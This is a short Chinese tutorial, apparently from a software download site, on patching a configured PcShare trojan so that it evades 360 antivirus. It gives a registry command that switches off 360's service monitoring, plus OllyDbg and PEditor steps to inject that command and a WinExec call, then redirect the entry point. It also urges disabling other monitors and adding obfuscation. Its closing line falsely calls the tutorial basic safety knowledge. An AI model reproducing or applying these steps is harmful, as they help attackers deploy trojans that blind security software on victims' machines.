PCSHARE過360服務(wù)項(xiàng)監(jiān)控
發(fā)表時(shí)間:2023-05-31 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:6
[摘要]ASM匯編 這個(gè)是最舒服的, 用OD打開已經(jīng)配置好的馬, 找0區(qū)(也可以用TOPO加空段)要很大一片哦!右擊, 選擇“二進(jìn)制”→&...
ASM匯編
這個(gè)是最舒服的, 用OD打開已經(jīng)配置好的馬, 找0區(qū)(也可以用TOPO加空段)要很大一片哦!右擊, 選擇“二進(jìn)制”→“編輯”, 在ASCII中輸入“Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”記下寫入命令的改動(dòng)的第一個(gè)地址, 假設(shè)為401180。
再找一個(gè)小空段, 記下地址, 假設(shè)為40116A
寫入:
Push 401180 (也就是那個(gè)改動(dòng)的地址)
Call WinExec
Jmp 原程序入口點(diǎn)(在OD右邊窗口的EIP后面可以看到)
打開OC把40116A轉(zhuǎn)換為文件偏移0000056A
再用PEditor打開, 把原入口點(diǎn)改為0000056A
這樣一個(gè)過360服務(wù)監(jiān)控的木馬就誕生了。
(大家完全可以按照加花的步驟來寫, 就是命令不同而已)
大家也可以禁用其他360的監(jiān)控項(xiàng)目, 即使加個(gè)花都沒問題, 隨便大家發(fā)揮了。
上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。